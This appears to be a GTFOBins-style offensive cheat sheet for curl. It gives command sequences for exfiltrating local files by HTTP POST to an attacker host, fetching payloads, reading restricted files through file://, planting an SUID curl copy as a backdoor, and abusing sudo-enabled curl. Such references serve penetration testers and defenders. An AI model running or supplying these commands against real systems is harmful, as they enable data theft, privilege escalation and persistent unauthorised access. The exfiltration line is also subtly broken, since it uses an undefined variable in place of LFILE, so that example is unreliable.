It can exfiltrate files on the network.
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the @ to send hard-coded data.
URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URLIt can download remote files.
Fetch a remote file via HTTP GET request.
URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILEIt reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
The file path must be absolute.
LFILE=/tmp/file_to_read
curl file://$LFILEIt runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run sh -p, omit the -p argument on systems
like Debian that allow the default sh shell to run with SUID privileges.
Fetch a remote file via HTTP GET request.
sudo sh -c 'cp $(which curl) .; chmod +s ./curl'
URL=http://attacker.com/file_to_get
LFILE=file_to_save
./curl $URL -o $LFILEIt runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
Fetch a remote file via HTTP GET request.
URL=http://attacker.com/file_to_get
LFILE=file_to_save
sudo -E curl $URL -o $LFILE